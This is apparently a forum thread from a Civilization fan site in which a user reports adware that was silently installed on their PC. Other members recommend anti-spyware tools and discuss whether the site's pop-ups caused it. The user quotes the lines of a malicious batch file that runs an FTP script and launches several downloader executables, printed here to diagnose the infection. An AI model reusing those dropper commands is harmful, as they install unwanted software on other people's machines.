Foistware from CFC?

[scoutsout]

Last night this was the only site I logged onto - therefore, I believe the things that were foisted onto my machine came from, or through, this site. I left the connection on when I went to bed. At some point the connection was dropped (thanks for small favors).

After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".

I found the following modifications to my system:

Running processes
loader
id53
pef

New desktop Icons:

Lycos Sidesearch
appears to be a browser hijack

0021-bdl94126.exe
No information given in "properties", but icon was a "setup" icon.

CS4P20.exe
Company Name: Clear Search
Product Name: Loader

"o"
No information given in "properties"

"o.bat"
Commands as follows:

if not exist C:\WINDOWSstatuslog ftp -s
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe

"infamous_downloader.exe",
No information given in "properties"

install2.exe
Company Name: TODO
Product Name: Spawner.exe

silent.exe
No information given in "properties"

New folder under c: "installer", with "id53.exe" in it
New folder under c: "temporary", with stcterms.html in it

New Windows Startup Items:
PowerReg Scheduler.exe
PowerRegSchedulerV3.exe

In c:\windows
"infamous.exe"

In the program files directory
New Folder "Lycos"
New programs "over.exe" and "pup.exe"

After cleaning all of this crap out, starting internet explorer, my browser was hijacked to the following:

http://default-homepage-network.com/start.cgi?hkcu

This morning I see we now have popup windows on the forums side of CFC. That really is too bad.

 

[scoutsout]

Would somebody please verify if the company propagating this popup is popping it up through CFC Forums? I mean, come on people, my wife thinks American Photographer is porn. I really don't need stuff like this when I'm trying to read a turnlog:

 

[Dell19]

You've probably got it from somewhere else if its popping up whilst actually browsing the forum since you should only get adverts on the mainpage.

 

[Knight-Dragon]

We, at CFC, don't condone this. TF will surely raise a complaint with our site host, and ask them to remove it (if it's fr here) - since we're a family friendly site.

 

[scoutsout]

@XIII: Thank you. I can't ask any more than for someone in the know to check it out.

@Dell19: at the time that thing popped up, there were no suspicious processes running (Explorer, systray, rnapp, and one MSIE window, nothing else) and I was on CFC forums, reading a turnlog. I'm 99% sure I got rid of everything that was foisted. I have "forums.civfanatics.com" bookmarked, and that's usually the way I enter this site... because the main page has popups. All I can do is describe what I see going on...

 

[MarineCorps]

I just scanned my computer and all I found were a bunch of tracking cookies. But on s semi different note no Red Serrif.....

 

[scoutsout]

I also should have mentioned - AdAware caught NONE of this stuff. Also - when I closed my browser earlier, I got a popup. I see three possibilities (someone please tell me if they see another):

1) Something still has my browser 'hooked' after the foistware routine.
2) there's a TSR process running that's invisible to the task manager
3) There's something in the scripts/code that make up the pages of the forums.

Believe it or not, I'm hoping it's #1.

 

[Dell19]

Have you tried updating adaware to get the latest updates?

 

[scoutsout]

Okay - the forums side seems to be behaving nicely from work... so that eliminates #3. I'm still fairly certain that the foistware came from a popup window off the main site (I surfed it a little last night too...) but at least the problem seems to be somewhat isolated.

@Dell - thanks for your interest/concern/help/advice... I appreciate it. I'll check back in here after I spend some time on my machine this eveining.

 

[Dell19]

I have to have something to do to distract me from revising...

 

[eyrei]

When was the last time you rebooted before you visited CFC? Often, software like that doesn't start functioning until the computer reboots, as the instructions to install and run the programs is in the registry and autoexec files. There is some spyware that you might get from CFC, but none of it seems malignant like you are describing.

 

[RoddyVR]

scoutsout,

i had the same thing a while back (popups from out of nowwhere and other evilness). was sure it was CFC that was doing it. ran a couple of the ADaware and the like scanners. they cleaned off a couple things, but it was still happening.
SpyBot S&D found 3 more though, and after that it all stopped.

it seems to me that all these scanning/cleaning softwares dont have ALL the spyware/adware progs listed in them, so they dont always catch everything. try DLing another cleaner (spybot seems to be a good free one for me).

the fact that its comming up during CFC browsing doesnt realy mean anything.
if you want to run a clean test, try rebooting your machine then going to like MSN.com or CNN or something and leaving it there overnight, see if the popups come around again. if they do, its not cfc, its another adware/spyware on your system that your cleaner software didnt find and doesnt know about (you have updated it right?)

 

[eyrei]

Download hijackthis from that site. There forum also has some very useful information.

 

[Paalikles]

Some spyware...that's an understatement

My advice:

www.spybot.info <-- Spybot Search and Destroy
combined with adaware (remember to configure adaware to do a deepscan + search compressed archives)
www.trendmicro - use housecall if you dont have your own virus scanner. I use Trendmicro's internet security, which also detects malware and spyware - so I reckon their free tool Housecall will also do that.

Configure IE to ask you before accepting cookies - that may not do much, but afaik it provides at least some benefit.
http://www.javacoolsoftware.com/spywareblaster.html is another good tool to combat spyware
also try the spywareguard from the same company (check under the download section)

Also - remember that some malware is more harmless than others: I recently removed a trojan from a friend's computer "small.5" which does not deliver a destructive payload, but hangs the computer. I removed the running process, and manually deleted the program - then the machine showed no infections

 

[Civrules]

Doesn't this involve the same problem?
http://forums.civfanatics.com/showthread.php?t=88547

 

[scoutsout]

or...this one?

http://forums.civfanatics.com/showthread.php?t=86766

 

[Dell19]

Probably although they may not all be exactly the same problem as only a few posters seem to suffer from this.

 

[scoutsout]

At the risk of sounding argumentative, we know that only a few posters are posting about this. We don't know that only a few posters are suffering from this. Two similar threads started on the same day sounds a little suspicious to me.

And I just remembered that this machine I'm on now has a different OS and some different software that makes it a little harder for me to have foistware downloaded to this machine without my explicit consent.

@Roddy (and others) Got Spybot. Thanks!

 

[Dell19]

You might be correct but two is only one more than one so both possibilities have a reasonable chance of being correct at the moment. Another thing that might be helping me is that I am behind a university firewall.

 

[shirleyrocks]

Well, how about three people then? This afternoon, just as I was entering the CFC website, my anti-virus software popped up with an alert notification. Something along these lines (from my logfile)...

Action: File Deleted
Infection: HTML.MHTMLRedir.Exploit
Infection Type: Trojan

I think Thunderfall's host is feeding him some bad pop-ups.